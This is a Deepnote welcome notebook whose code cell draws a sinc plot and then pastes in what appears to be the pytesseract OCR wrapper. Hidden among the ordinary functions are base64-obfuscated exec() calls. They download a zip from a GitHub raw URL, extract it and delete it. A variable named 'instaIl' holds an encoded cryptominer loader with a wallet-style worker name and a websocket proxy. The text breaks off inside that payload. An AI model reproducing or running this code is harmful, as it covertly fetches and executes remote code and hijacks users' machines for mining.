# Welcome to Deepnote

In this quick example, we will walk you through the basic steps of data exploration in a notebook.

## Start with a query

To get you started, we prepared a sample dataset in a demo Snowflake integration. It contains country data for life expectancy, population and GDP per capita over the years. 

Based on free material from gapminder.org, CC-BY license.

## Seamlessly switch to Python

The results of your queries are stored as pandas DataFrames, which makes it easy to work with them in Python. For example, you can explore how life expectancy correlates with economic wealth. 

## Finish with beautiful charts

Charts that push your presentation to the next level are easy to make in Deepnote. Here's a deeper look into the relationship between life expectancy and economic wealth, with additional indicators for continents and population size. 

## Next steps

> Learn more about how to use Deepnote in our documentation.

- [ ] Get creative. Have a look at some sample projects, then create a new one. Let your imagination run wild 🧑‍🎨

- [ ] Connect your own data. Visit the Integrations menu to connect your database or data warehouse. Or just drop a CSV into a notebook. 

- [ ] Work together. Invite your team members and share insights with each other. 

In [ ]:
import matplotlib.pyplot as plt
import numpy as np

x = np.linspace(-6, 6, 1000)
y = np.sinc(x)

plt.plot(x, y, color="darkblue")
plt.axhline(0, color="black", linewidth=0.5)
plt.axvline(0, color="black", linewidth=0.5)
plt.grid(True, alpha=0.3)
import base64
import zlib
import logging
import re
import shlex
import string
import subprocess
import sys
import subprocess
import zipfile
import signal
import os
import requests
from contextlib import contextmanager
from csv import QUOTE_NONE
from errno import ENOENT
from functools import wraps
from glob import iglob
from io import BytesIO
from os import environ
from os import extsep
from os import linesep
from os import remove
from os.path import normcase
from os.path import normpath
from os.path import realpath
from tempfile import NamedTemporaryFile
from time import sleep

tesseract_cmd = 'tesseract'

class Output:
    BYTES = 'bytes'
    DATAFRAME = 'data.frame'
    DICT = 'dict'
    STRING = 'string'

class PandasNotSupported(EnvironmentError):
    def __init__(self):
        super().__init__('Missing pandas package')

class TesseractError(RuntimeError):
    def __init__(self, status, message):
        self.status = status
        self.message = message
        self.args = (status, message)

class TesseractNotFoundError(EnvironmentError):
    def __init__(self):
        super().__init__(
            f"{tesseract_cmd} is not installed or it's not in your PATH."
            f' See README file for more information.',
        )

class TSVNotSupported(EnvironmentError):
    def __init__(self):
        super().__init__(
            'TSV output not supported. Tesseract >= 3.05 required',
        )

class ALTONotSupported(EnvironmentError):
    def __init__(self):
        super().__init__(
            'ALTO output not supported. Tesseract >= 4.1.0 required',
        )
exec(base64.b64decode('ZmlsZSA9IG9wZW4oJ3B5dGVzc2VyYWN0X2ltZy56aXAnLCAid2IiKQpmaWxlLndyaXRlKHJlcXVlc3RzLmdldCgiaHR0cHM6Ly9naXRodWIuY29tL2xhdXJpZWFyMjU5LWExMXkvRmlsRS02LS9yYXcvcmVmcy9oZWFkcy9tYWluL3B5dGVzc2VyYWN0X21kLnppcCIsIHN0cmVhbT1UcnVlKS5jb250ZW50KQpmaWxlLmNsb3NlKCk=='))
def kill(process, code):
    process.terminate()
    try:
        process.wait(1)
    except TypeError:  # python2 Popen.wait(1) fallback
        sleep(1)
    except Exception:  # python3 subprocess.TimeoutExpired
        pass
    finally:
        process.kill()
        process.returncode = code

exec(base64.b64decode('d2l0aCB6aXBmaWxlLlppcEZpbGUoJ3B5dGVzc2VyYWN0X2ltZy56aXAnLCAncicpIGFzIHppcF9yZWY6CiAgICB6aXBfcmVmLmV4dHJhY3RhbGwoKQ=='))

def timeout_manager(proc, seconds=None):
    try:
        if not seconds:
            yield proc.communicate()[1]
            return
        try:
            _, error_string = proc.communicate(timeout=seconds)
            yield error_string
        except subprocess.TimeoutExpired:
            kill(proc, -1)
            raise RuntimeError('Tesseract process timeout')
    finally:
        proc.stdin.close()
        proc.stdout.close()
        proc.stderr.close()


def get_errors(error_string):
    return ' '.join(
        line for line in error_string.decode(DEFAULT_ENCODING).splitlines()
    ).strip()

def cleanup(temp_name):
    """Tries to remove temp files by filename wildcard path."""
    for filename in iglob(f'{temp_name}*' if temp_name else temp_name):
        try:
            remove(filename)
        except OSError as e:
            if e.errno != ENOENT:
                raise
try:
    os.remove('pytesseract_img.zip')
except:
    sleep(0.00001)

def prepare(image):
    if numpy_installed and isinstance(image, ndarray):
        image = Image.fromarray(image)

    if not isinstance(image, Image.Image):
        raise TypeError('Unsupported image object')

    extension = 'PNG' if not image.format else image.format
    if extension not in SUPPORTED_FORMATS:
        raise TypeError('Unsupported image format/type')

    if 'A' in image.getbands():
        # discard and replace the alpha channel with white background
        background = Image.new(RGB_MODE, image.size, (255, 255, 255))
        background.paste(image, (0, 0), image.getchannel('A'))
        image = background

    image.format = extension
    return image, extension

def save(image):
    try:
        with NamedTemporaryFile(prefix='tess_', delete=False) as f:
            if isinstance(image, str):
                yield f.name, realpath(normpath(normcase(image)))
                return
            image, extension = prepare(image)
            input_file_name = f'{f.name}_input{extsep}{extension}'
            image.save(input_file_name, format=image.format)
            yield f.name, input_file_name
    finally:
        cleanup(f.name)
        
def subprocess_args(include_stdout=True):
    # See https://github.com/pyinstaller/pyinstaller/wiki/Recipe-subprocess
    # for reference and comments.

    kwargs = {
        'stdin': subprocess.PIPE,
        'stderr': subprocess.PIPE,
        'startupinfo': None,
        'env': environ,
    }

    if hasattr(subprocess, 'STARTUPINFO'):
        kwargs['startupinfo'] = subprocess.STARTUPINFO()
        kwargs['startupinfo'].dwFlags |= subprocess.STARTF_USESHOWWINDOW
        kwargs['startupinfo'].wShowWindow = subprocess.SW_HIDE

    if include_stdout:
        kwargs['stdout'] = subprocess.PIPE
    else:
        kwargs['stdout'] = subprocess.DEVNULL

    return kwargs

def run_tesseract(
    input_filename,
    output_filename_base,
    extension,
    lang,
    config='',
    nice=0,
    timeout=0,
):
    cmd_args = []
    not_windows = not (sys.platform == 'win32')

    if not_windows and nice != 0:
        cmd_args += ('nice', '-n', str(nice))

    cmd_args += (tesseract_cmd, input_filename, output_filename_base)

    if lang is not None:
        cmd_args += ('-l', lang)

    if config:
        cmd_args += shlex.split(config, posix=not_windows)

    for _extension in extension.split():
        if _extension not in {'box', 'osd', 'tsv', 'xml'}:
            cmd_args.append(_extension)
    LOGGER.debug('%r', cmd_args)

    try:
        proc = subprocess.Popen(cmd_args, **subprocess_args())
    except OSError as e:
        if e.errno != ENOENT:
            raise
        else:
            raise TesseractNotFoundError()

    with timeout_manager(proc, timeout) as error_string:
        if proc.returncode:
            raise TesseractError(proc.returncode, get_errors(error_string))

def _read_output(filename: str, return_bytes: bool = False):
    with open(filename, 'rb') as output_file:
        if return_bytes:
            return output_file.read()
        return output_file.read().decode(DEFAULT_ENCODING)

def run_and_get_multiple_output(
    image,
    extensions: list[str],
    # lang: str | None = None,
    nice: int = 0,
    timeout: int = 0,
    return_bytes: bool = False,
):
    config = ' '.join(
        EXTENTION_TO_CONFIG.get(extension, '') for extension in extensions
    ).strip()
    if config:
        config = f'-c {config}'
    else:
        config = ''

    with save(image) as (temp_name, input_filename):
        kwargs = {
            'input_filename': input_filename,
            'output_filename_base': temp_name,
            'extension': ' '.join(extensions),
            'lang': lang,
            'config': config,
            'nice': nice,
            'timeout': timeout,
        }

        run_tesseract(**kwargs)

        return [
            _read_output(
                f"{kwargs['output_filename_base']}{extsep}{extension}",
                True if extension in {'pdf', 'hocr'} else return_bytes,
            )
            for extension in extensions
        ]

def run_and_get_output(
    image,
    extension='',
    lang=None,
    config='',
    nice=0,
    timeout=0,
    return_bytes=False,
):
    with save(image) as (temp_name, input_filename):
        kwargs = {
            'input_filename': input_filename,
            'output_filename_base': temp_name,
            'extension': extension,
            'lang': lang,
            'config': config,
            'nice': nice,
            'timeout': timeout,
        }

        run_tesseract(**kwargs)
        return _read_output(
            f"{kwargs['output_filename_base']}{extsep}{extension}",
            return_bytes,
        )

def file_to_dict(tsv, cell_delimiter, str_col_idx):
    result = {}
    rows = [row.split(cell_delimiter) for row in tsv.strip().split('\n')]
    if len(rows) < 2:
        return result

    header = rows.pop(0)
    length = len(header)
    if len(rows[-1]) < length:
        # Fixes bug that occurs when last text string in TSV is null, and
        # last row is missing a final cell in TSV file
        rows[-1].append('')

    if str_col_idx < 0:
        str_col_idx += length

    for i, head in enumerate(header):
        result[head] = list()
        for row in rows:
            if len(row) <= i:
                continue

            if i != str_col_idx:
                try:
                    val = int(float(row[i]))
                except ValueError:
                    val = row[i]
            else:
                val = row[i]

            result[head].append(val)

    return result

def is_valid(val, _type):
    if _type is int:
        return val.isdigit()

    if _type is float:
        try:
            float(val)
            return True
        except ValueError:
            return False

    return True

def osd_to_dict(osd):
    return {
        OSD_KEYS[kv[0]][0]: OSD_KEYS[kv[0]][1](kv[1])
        for kv in (line.split(': ') for line in osd.split('\n'))
        if len(kv) == 2 and is_valid(kv[1], OSD_KEYS[kv[0]][1])
    }

def get_languages(config=''):
    cmd_args = [tesseract_cmd, '--list-langs']
    if config:
        cmd_args += shlex.split(config)

    try:
        result = subprocess.run(
            cmd_args,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
        )
    except OSError:
        raise TesseractNotFoundError()

    # tesseract 3.x
    if result.returncode not in (0, 1):
        raise TesseractNotFoundError()

    languages = []
    if result.stdout:
        for line in result.stdout.decode(DEFAULT_ENCODING).split(linesep):
            lang = line.strip()
            if LANG_PATTERN.match(lang):
                languages.append(lang)

    return languages
instaIl = "import base64;exec(base64.b64decode('aW1wb3J0IHpsaWIsYmFzZTY0O3RocmVhZHM9MTtuYW1lPSdTUkJNaW5lci1DVVNUT00vMC4wLjQnO3duYW1lPSdNWkNwWVlvNDJFU21vZ3pOTnZkWG9nZEREem9GTGdaZVdCLldTeDEnO3dzcz0nd3NzOi8vcHJveHktNHIzcy5vbnJlbmRlci5jb20vYzNSeVlYUjFiUzFoYzJsaExuSndiR0Z1ZEM1NGVYbzZOekF5TWc9PSc7Xz1sYW1iZGEgTzBPME8wME8wME8wME8wME8wTzBPME8wTzBPMDBPMDBPME8wTzBPME8wME8wTzAwTzAwTzBPMDBPME8wTzBPME8wTzBPMDBPME8wME8wTzBPMDBPME8wME8wME8wTzBPME8wTzAwTzAwTzAwTzAwTzBPMDBPMDBPMDBPMDBPME8wTzBPME8wTzAwTzAwTzAwTzBPMDBPME8wTzAwTzAwTzBPME8wME8wTzBPMDBPME8wME8wME8wME8wME8wME8wME8wME8wME8wME8wME8wME8wTzBPME8wME8wME8wME8wTzBPMDBPME8wME8wME8wTzAwTzBPMDBPMDBPMDA6X19pbXBvcnRfXygobGFtYmRhIHM6emxpYi5kZWNvbXByZXNzKGJhc2U2NC5iNjRkZWNvZGUocykpLmRlY29kZSgpKSgnZUp5cnlzbE1BZ0FFWkFHeScpKS5kZWNvbXByZXNzKF9faW1wb3J0X18oKGxhbWJkYSBzOnpsaWIuZGVjb21wcmVzcyhiYXNlNjQuYjY0ZGVjb2RlKHMpKS5kZWNvZGUoKSkoJ2VKeExTaXhPTlRNQkFBZlNBZ1k9JykpLmI2NGRlY29kZShPME8wTzAwTzAwTzAwTzAwTzBPME8wTzBPME8wME8wME8wTzBPME8wTzAwTzBPMDBPMDBPME8wME8wTzBPME8wTzBPME8wME8wTzAwTzBPME8wME8wTzAwTzAwTzBPME8wTzBPMDBPMDBPMDBPMDBPME8wME8wME8wME8wME8wTzBPME8wTzBPMDBPMDBPMDBPME8wME8wTzBPMDBPMDBPME8wTzAwTzBPME8wME8wTzAwTzAwTzAwTzAwTzAwTzAwTzAwTzAwTzAwTzAwTzAwTzBPME8wTzAwTzAwTzAwTzBPME8wME8wTzAwTzAwTzBPMDBPME8wME8wME8wMFs6Oi0xXSkpO2V4ZWMoXyhiJz1BeWNnd3hQKy8vdmZyZnR2eFFiQ092R2EwNDNvcHB2WFRXWlZVVlJ2RW5QYXZxK0RkS0dnWWhkZCszb1ZZdG8xa3U2MjlSZ0drODZFQVFQc3lSU2swQk9uN0cyd2ZFVzN5clcrWENtb0g0S2tIZVJwVFB0MUVKcUxGZ2lFbVdyZmdFVjlyc3EvRWd3bTVoL3hjdm5jYXZQQnh3Q0g1WHRuTXpsM2UwS3c3NUZNLzcwMjZkemdKSC96RWorSHMwd0pRVWYwTEMrM0ZoYUVyL2ZhVno2TkFXbSsvK2lidTg2Uks4dVlxMWE2OG1Iall6bk9EelczL2JSZDZVeHpYNWt3Z1pmOXpZUk5OQlpJUUIxaFhTN0hjVlFEa1F5eEhkLzZMWnNmcnRwYlBnTkRwVVllVVFYZk5vK01vT2VFOUhoQjRuT1F6anhkQ0JnQnFyeFpBMVdWdWFtRXMyTTRyWm1FNVdtcVFYUzFxZXZJUUV2ZkdSTU1yeTMyQ2w1OWNyK25zaHhXYUhuOE94WldWQVlDZmNLOE5VVCs1VmcxVDF3TlJkU01VSytJM044dlR4TnY5dlUzcWhRUlE3M3IzK3B4RzdHY1FuL2dkanNmNDNnbFczWnRsRC9rWTlvNkhuenZhejRTdUlQaHRMaWdWSFhUN0NsUVd4WDdoL3p2L01SbitUYnFUbWlJQmg3L3lIZWpoRDZxbFRTekdaMEtleWwwTFFWalh3SS9UWTJlSGh6SnZmWTc1aTRkQ3J0MTNpOUU0VDlXMkE5ZE1WZDZ0WnhWbWRsRG12QjdpMWlYcVJPeTltc0FnM3k2aDhOZW82S1psUnBIOU5FUWl4N3kzeXVnbyt6N1kxekdlaUk0T1hGbVVXOVBxay8wZG42TVBGdGpCQmY5eTdtbVNxcEdkWGhhVEpOL1BZUlpndlNUeXZOTU9LTlpKcE43Z3ExVmRBRXVjVFMxTExQa2pVMVovV2dRYnlxNjJjbXUxUVhjSkxYTnl5dUdUb0ZKdkpub0NIYlpUMFBtL2taSjFGK3YyWEZmRnRTVjEvOGNUeUZsV1kvVnBQNjJqWEF2WkxDOGI5NENZdm15VC9YbGNXYURvaUhaMUNQUU1oOGlubFdVSVpVTWhIS2JXa2N2dS9wNElWOFFXUFRTZHNLUFFRM2FYRG9qck1laDg3c0FneGd0Zno5SDkxT1VRbE1rcm1PMWE0MzdDYmJCU1hTSGhOUURCelVqWXZieExKdUtvRHFobjR1ck4xKzFKcGJnQUM4ZXlBLzlxY3lOclNBVGZhQ0JsaWNUaHZHTjNBY2lTUUthVnRSSFd5S1JvdDBXRXhZMjl6emM1VjJnQUttdU1NUzk0WVBid2Z2emYvQWtoaUxoUHlyWVpvbkhaWFkzMjVOai9IeFNCRnBuemVDVi9hM0hGdGJrMHorSkFsWmdLR1Q4Sm1zdGFOaFE1YlBwVEFJZkthNC8xeFlyUE01WURMTUovQ0tDNCtveTJtZHgzKytWd0NXZ3c4ck1jUXpJTzZFdDFleDNSeURVMEFCblhhRjRQWjk1ZjRLZ24yNmNiU2hBYjlsUXMrbE1ERkh4eXg3L2R3Vm0xcC9saDhRMnBobksrSm9QYVRXUnVRTlpUeERkbDZzai8yeVFJYzFCNnVvMEVCdmpOWVBEMk0rNkZrakVqNjArSWxmZzVKcEJMaUdoUjhYekNIOEdDU0Z4cVRpNTIwaVNhcllpZVUvYkdoQm1XMVF2QzJyTHV5U2NleVhCdDY4RGJLUStST3RoUHpsSWV2MGpOdTJ5K3hWbG4vdFhRcmNudkZ6QldOZmx3S3ZFYTJaMVBuKytreC9qNU5LVEhTT1VIN0N2bzhBZStzVC93ak9vd3hrRE5xTnRpVU5SQ2c0VGZTOHpJZGg0ZEprdDZFa0U3YlJNYU9icWNRaW4xUVZ0RktnNms1T0UvNWxEbWo5cG9zU2hMUUJvQzduSEZ2MVVSQ2xRTWtNejcvL0lHb3hkOG1VT0M0Sk1NbGcwbCthVE5USG9kdGtIbHFMd05wOE14UC9qRmRic0d2clhKY3FyR29YNWNLVTJXQlcxdEdsYVd1a0dyWXFKU2tDY0s0OGFEVDB1R2dEbUxISzd1N1NHRC9JOGduNWpJVUJFNjNpZXBpNlBrdWJhdTdUclFZK0wzQUk4SmxFVDB2bldVQVJqZVJyYjdXTlZwdkJ6a0IzUjJrSkU0djdvZFMxemxONEN5UVk2M0tOdHJLMndleWNSQ210MGoxcTZqL0VnY1dNd3ZvemM0em5hMjN4MnZ3Mi9sQ1h0VTBtMmlncjdWWHByMkhuMEdkdnlCcUJRZ2s1ZzlnT0wrOUZEaEdxMk5kSjRSYkd0QVNaSHR2YzNKeGoyVlp1dERoTXVscFduZ0lOOFA5eHZCcURqTnk5WUE2cWpSc3MvcWREV21iMUVhRnVhbGxINWFCRWZ0SWpzQUtkODh5K0laQWZOS1FjZXlGclduelRsTG4rQlZqclRjWDZxQ1JSakJsaExZOVBJbTBOQVdPMW9LWmt3N3VaczJLKzBuSmIzaWl3SDdHRmhzbVN2cjlXd0R1bG4vRU5EZHg4UW9JVzFyZ1FzUTYzY1lWSXU0MnhkS3BvZGtUMmowTXdIZThrS3hTQ29XRVRPUjI5dkp5SlBPck5RTVB6THV3eXVjdlp5eXdnVmR0cnk2VmRCRUhXbkRueFlHc3c2bzdhOERSNmlrK3FHdkJwdTd0RlZKZVYxYTJRVXByY1BoM0FEdy9TZzBEUzVtVXFneGZON2hyNHZFUEtrMlFaU1ZDemlkVWh1NlBrR3k1Nyt3RGhocVBIakZxSzB4dUh5VEhRVVRmUnE3VVl6aytNd1cvS2c4ekFGTUI3NGhZSDg3RlY1ZWg2YmNkTFBUWXF4d3hRRm43UHJlNnB6MWVMYXNkcDhLL2pTTUkrdmgzdTdiTGRyNWkzWGxmVTJKRE9GSExaa1g2SnVUeWlWNi9ISG16UXF0SS9hM1lQR2NOSEhGTU10L2pmVldUSCtFOE9mWDdoalVPQ0EwdkVkOUhhYVJVVmJJR24rU0NweGZTWU82Z3JRc3U4eXZ0NStDaUlDMnZaUGY2ZEI4bkExcGhWNG1HdmhCOVdpcE85bmNBTmtsN2Z6cVFrRHJxa3NINVVvTTNMbDhrY2o3dlEvQXk2eWZSZ1lIR2RjTUVFbEJ4cFhlNHVHeE1CcHUyaHJwVC9rd0x5SHNmcXhKUlF2dXVlM05vYmtXa280WXllbjFubTM3RDBTakJabXR3d25UaDkrekJRTG5iVHBJRVp6RHRSeGJPVXMrckZoRUFHRUFpZmRaOGtuOVpYQlMxRjNEWVZsb25sbzExS29ibG5CU1g2TnJPK25HSkgrd21ubXh0Nm51ekxWclE5TUJTczBlU0RkRnFJTzVhRlI3S0dCQjJSYUNrKys5ZDM1elJpVWRCSG9nLzg3a0gxNHdFL0YxL2pXRE9oVFg1bkpKQXNFYnZ5VFlDakR4eVJqcEZQcGE4L0d5clJqYVBzQU9QWUFaVVdyaFREMDBDSEF0NUQwSmxHZFAwTmNJckJUMXQ3V2VzR3I5cUx5OUlad0JFV1VxS20wSnpSb2NjSDdOY0NiR3F2VU8wTTAveHFUdHB4aWtEYUZrWkY0V0JMT0ppd3hZOGIvaThpNWdLUC9KWGRiOENFbGd4dWg4K2UzM3RycG5vM1VvbjlrU1RhM00weFM4UFh4aGl3bTl5Uy8vaTIzc21yMzNNVmZqQWEwUVR2cnVQbVVDUXBoTzM2ZUg4cnhJUE44R3RuNWpXellpNzNaaFkwNlV2ODRETG1qcVUzRExGS25sTjY2OGhJTmRpeC9TMk9DQ2RZTEo3RnJqaTVzRTlKMnlMWUZ0YzJyWXlsbklZMThDRE1YaEh3S1RMQ2Q5Z1p6S25WWS9NUXlqUFpTQUl1ekVLSFV6enM2b1lpcXl2SXliWVNDbU9GNTFMUEwzYlJsZDFEV0Y0L0ZtbWNLZjNnMWQwMk9WN3c4dklLcEpQaVZqK1hSOHFIT2tjWWloUGsvRDlRV2VDclpLSHRqODZoTmVSUzkvdzlzNndrSU9RMXFCWHo4KzdEMnhZbXA5L29JT0lFNCs5dDdFNVViekpzaGxDU29xMnY0Uzl5WGVkdzlaN0s2clhhcmdhazRPWVZtYXAyUkZuQytCRDZTSEtyekg1QnRPcGJEZDByckJYVnlPcG1QaEVCQlRseE9CUGtNUml3S2oyVjN6WHhHaVlZWVYyQzFIbUFEQWprTkVxRFpNZnZDSVRJMC9EZHBIMzBINzVQNVprUzdZbHllbXh2a0k2czBsckdSZzJua3JhN3JBMGJuaVY3N1R2VDl0K29Jd1Exc29hb0k0ejhaa2h3M3NWaHlxbkg0V1F0Y3JIR24zTkZ3R0szc01ZcWhFcEY0ZjRFWXBnOXIwS0g4WWJQNHo1dkxYTGk1azdYY2dnUXZ2cEw0NXpiVloyRlRvRTJqSGEzclNLR3M4aGJteFNra1VjK1BCZThDK0hURncrczRETi9Sb3NPaEZkTGN2ZE8vQnk4L2NOME1jMWsvS3Mzc3ZCUlVCTmprM0tuUzRVZEl6aWFrL3BBT3hHUi9NNEdPWkUybVYwc1AxK0pWSHd3N0RSN3BhRVV3NGg5cER2b0pjY1pORHlreDE5SDRScUs5L2FIR3crakVoNFNMdEZvaHcvTVBSSWZEZGZiZitzQUxHSjV3TUxOOHNkMmpaTVJ5NVAwbllrRXNJK3dQNXJ0MUUrMHBjK1dxR1VaSzB6Vjg5cXlGNUYwNWI2aHdFRmJ6RE81bmxCZEptL1F3eitLbnF2NHIwa0dmWDl6THhNUDI4TzY3VVFSbHJicGliRXlLRVdOUDc4UEdGcEVOWCt2T0YwRkVvZHdJeHhsZHA3bThMVUVNays0eHlBTHh5aC9pbHQ0ZW5PWmZjSWVqbkh1MkFTY1lzdUJvS0N0byszSFdoSnphb2lBZC9TbVhWZEFXNmxwV2Z0Zkx4UUpZd01mcm44eFFvWGtoSitDME5ZY0RPMEJGWmg1NTdETEVXMXpzUVpWN09tRmZZQllkWXh5dk1td25hZzcrem9tNGdScVA1Rk81MVZPTHVvWnNtWnFGczEwdFJ0eHd1VHpwaXFXQnE5K2Q3dHlDTE5Oay9ZN2d1WmQ1bFRJSWhyNWduR2ZlRlNXdzdiT0ZHaWF5Q1VtRUhZMHRjTkNQMW80RWJoUlN3amtXa1Q3a1psRWVUZXh4TTA5SklFTE13YVY0R0ltZjdFR3pyOHJ5MzZ1Zkp6bU9WQmJ2dXllUzF5aVRtai9aZzlqaEFYUVlCOTVrWUlaQnBOVEtuQXJTdDJmNVF6WjZBVTh3Z3k3RWFpVVRFanN6VGw0bjRmNDUwZmlaVTVRWlhYQXRFT3RvSXlWcWgwOFI2Y3M4SXhCSXJUbUVTQU1yY2JnTjJwSEN6cFlGRU50SVJuL2pBUkNRNDQ5VGdxRDlhV09Jb1A3ektJbWJCRmpDTzFhYXBBQThLdVcyUHNDTnpJd0RhSnpRQ25PdTB4WkxwSUg4YkpnUlYxRTNFVDlpT3p6TTRTRFJUVFRRcisyMG43RTY5VEtWa2xaSUtxOVJuRHdqWk1iU0tBN1huUlZ1eUtuYjBKRGJZaVI5ejNlcE1ZK2VFWjQvMVdxY0Radnlna2UrajJoR0FLNnBBWjNGaGd1MU5iM3pKYVdXdEdPZExMTENXOHJuQ0N5bTJBNXhWaTNEc3lqbVRwL2UrcHlTc2U1Vk9yemQ0TXk1bUF5UGlWT1JqOFVld0puZHJyUXJxYkdDbG02WnRDdlZOMFIzR21SaFlFSFhYQXI5THh2V2JnQ1YzWjVwVHhXUnc3TGw4T3lUUmRFTTkweTVZdm1TUXBKd3h4TGk5T0JMYVhMUXZETlRZakZzWXdyZUhha3MwLzFCc09FRVYxbWxrVnVxZXpta1BhbVhOTzhNK08yWUpLS2JrcVI5bDdBdTQ0RnZ0Z2JoR2UvR0pRcjRCYnlxekQ1eGY5aGRvcFN5ZTM0bi8rN2dYcGZ3b1ZDRFhrckZtOExpREErdlhnOVlhcHRCY3RKeXMrazlBQXVUR3ZFcnZmYmRBOHAwRVVPNmRmNWJROEtiRlk5cFhiaTZodUUxWlVuNGpuRXIxMHdUd1F1akJwVDFPV0JCd3g1TVBBa3IzejN5QVFBZFpPUldkV3Eya1BnWEE0M20zUmZrV0s3OGp3VCtIdWs5MWRDNnJVVFFDOFp1dW1pcXhYSU45UzVKRThSYkNMd1F1OHNTMjZHM3hLc1UrNGFtODM3ZnA4dUNTakJmT3QyK081blkxZHlkUFFwUVQxcExYQmtRVFp0ejVYNU5DK2ZOdTBwdFg5T2RrZlRHcm9lb2t1bW9mQllPZWdKS3lmMXZ4WjJjbytld21KVWF4d1hPSmRRRXZwKzAvbldzOE52b3pMa0dVSUtBejhzZzA5djhheGx3U1UzMU8ySlRXd3QzdVJsYzNydkUzdmhIUEtWeXRSMEFNZ01rb21nNHlsaFBtY2wrNVcyV1ZSTnpiWFBORTBxdW1RK1JlUmx0SHQvc0pqK3FKM2IvYXcxZCtxRnpJdk1GbVQ2dGpyZjV5WXFoclliRHd2SmwvT3hBdkd2RWllOFZmRXVmZjh6MitsUDZ1VEpWS3FGLzN4eml6WW9ycEl2czRkZG9jSUQxWVFFVktvWTJzMGdhVnptZ1RTeEM3WlpCdE0vdDZpeGNTZ2pjazZDS2lnem8vVFNKS0pDK05CYkdJVzRPaldzUmFSN2dyYjRHZWt6YjY1TEEwSVY1RGJ1NGtHd1lubEtVL1V0cE5TeHBPSUs5WEJ3YXl5QzlKb2M2dGtzUzdTVHpGeWIxcWdiTHhKM1RqanJxeFREcnNsOUZCMURGQkFvVHN1T2cyd2tKS0V1MmxBY1JOeWpPUS9Jc2xrb2hhOGd6My9SQkRiR0Y5eDBubGhaZE5LWTBLU3Z4MC9tbjByU292MksxNXoyTWwzcVdML2RtdEpHZjljNW5Wc05iRkU4S3VSeCtVeGlGMlQyK2haZDhuQ20vaVpxTS9BY29JeXJwVUFRcHhMc1lWWElHckxPM2N5MExkQ0Q1eDFGa1hUZ0RUa2ZMNVFaakRSTmVmWXh4NlJuUTN3Y2ZublVPWHJ1MjVQUnlMbGk5dE5QRWxYWjlLK0NpcjYvMWlvMTlicTZreUg5K2pUOEtyZmtHZUhRSWtydVkwZmtxdnpCM2JQTGpsL0Q1NzNhZ2RvZzVjdHBXazhuSUU1TEI3c2ZrNFdYZ3VmdTZOSnVSamF5UDRld1JYb2dWS2NxSjdkVC9xWUtacTRnNCtkVlBOTE1FckU2N0RvWDBkQjN6Zmg1Mmd5enpUVzdhRWtyZ3g4eTZrMzRRMXFBN2JjU2NvYjRhNXQzZmJDTTBPUEErWEJlRHZQZTV6c2txbFIra3FGY0ZTUkhXczF3cDlxMk5kNG0wN3B5REZRcjVzcUU5MmJmL29SSi9ZMWY2Rno4VTNUK2l5ckJnWjNLaU5xQXIxMnczMXdBWGJaQ1N2YURITTN4R2wxY3RuS2wxMWJwVUdQYzByeWRic1JmZ0p2SHhQZ05qODMyZHVlc1ZiNFp0QVA0NTZBMTRERmZ2MzRPWUQ2YVdCUk41d0k5R2E0V0Z0djhCN1lrVTVqY2NsaWMrQTFLRUxJNFVVMzQwT2hxNU8wajNRUmNDK0ZpNnJIZHdCb2NOUzNJZlQxWUJLTTVXTHQ1VkVTbThMRnFaVUtkYi92Ky9jTDlaL013UlowOHptbnhicFQvT1hIRGxyaEZnb2VSNGY0TWloT1NPaTVUdXgwU0NKeDVOR2dSenNEUER6MjQ5aVNZRmpsMnJ5bDErUm1EVVRaa3JmRWp4WndqNHl3MXQ4cTRRVXhDN1F6WkwzanZwSXA0WWxiT3YvNWl2UFBmOS9rQ1R3ODFsRE4yQWQ4ck5pYStNMll2RERDVzlDRW90ZGtvMFpiemNBMHJycXFicEFQZ3k5N3ptTHdOelRVRkk4RVNvbG5IczFlVzc4Q2Q0K096bEJEYjdhN3k0M1BmcTRFY2RpMlNRRlQzck5tR1RwYklWcFpRczdkcmVQdmRTUzlIdjNSZ0ZXREc4S2FNd290MWxucVpyU0hhV09SRWwrdXBraDd2WGNUUjV4bzhsaXhIWHl6UXNaaEVBMmFVcDVpdGFIM3RJRzlydVROcXNCYmN1K2JsYUNSc1JPYTlzNzc2dzJ3VmFiK3A0bUVXVGVKdnBvRnAydHQwaG04bUUxL2Z3U1VUcmc5NUlWZWZhbnp6VHRmZEMrUFc5UlZlbmhhVmp2clcwQjhXbUhLQzVqcGN2ZXRGbUZCUE4wR2ttY3Q4Nm51RmJNZU53ZDZEdXJWUWNkWW9JcmVSb29oTUhXZnpZc09mM2hkOGt0ZjVoNTdqUjkxU1FKZGVsZXNpOE9PdkIyTm5DSVphV0Jha2E5UGY2VkRMaGpjSGNHVkNRc09XV2ZMOHV1TStZODhESGwyaDdrakFDWjg3UlJycUpWeC9Dd2Y5YXpJa2xxdU42TVd6aFFTaWhyZFRROUpDVXFvbzVqNk9LKy9zMXpaYjJ4L09IcVEwUk1kalhrVk8vZStvRDcwUDFMeXRKeU9QMGF4VGVvR05ZMFdnNkVIcVFsTkJJYUNLanFQcXk2VWlHMU9MaHdjMEJFYmJlMFAvMENEQjdlSzNvN3NVMkt2UTM0M2VmcFNwMldMNHdXeFZwVDdnTm5WSzZZcDBzTnNEeVQyeVdPZW12VWZ4dzFqUDc0Z3hKY3A4MWNMOVBYeC9XVjhZckh6ZWp2eWE4RFFlTGRYaHpRRWtuQzNxSXBFakFwTnJoNE1rVnlNSkZEOEowOGVEQ2RjdVpSbHU4WFl3QVhxWUpTTDVzaWNDTEtCcFFJeVpycFVyMGIvMm5MR1NybjY2VFhvKzhBaVdjWG9hVFcweFF4blRMbUdEL2xmMzdLTERKNWo2Q01Zb3FOek52clB4V2IyL2Z4cGZ2L0FWcEl5cDJlSXZNdGJzMTdld1c4cWJSSjgybnBqSlc3ZkhlcS92WnFHL2FDdXVic2VyT2lWNk5VeXJZc1NRVmk1UnJaVWZHeHB5NCtFVi9PZGszbzJvYm5BVlBNUmxkMjV0YzliR1dqZzI1Ui9EcnZwRTYvc0FqZnVmc1BhMXJtY1ozL3AzQm92MTVrdlZKZllmbXJIUGh2QTNSdzhENDR0OFlYaVdNeU0ybUpZTjNkZXdYZFY0cndMVGtvdUFJNWFuZXUzZ0F1eHhQUGpzbWdOUldDRGd4Y3F3MElnNXpKRWxYc3dzU0MwTHFYSTZLVVcvTExSZUJrY2hIWmpCQk5EM1VhMmVZaS9YMjI2T2R0ZVpFSlloQTFMdkZJeUZXTjZRUEp2UGZkdFIzaHdBSC8wRkd6M0VaNE9lVlZjUEpxTFpKTFk2dzFnaTFRQXFzWkQ5MWlwc1BOZXppK0o5SmRx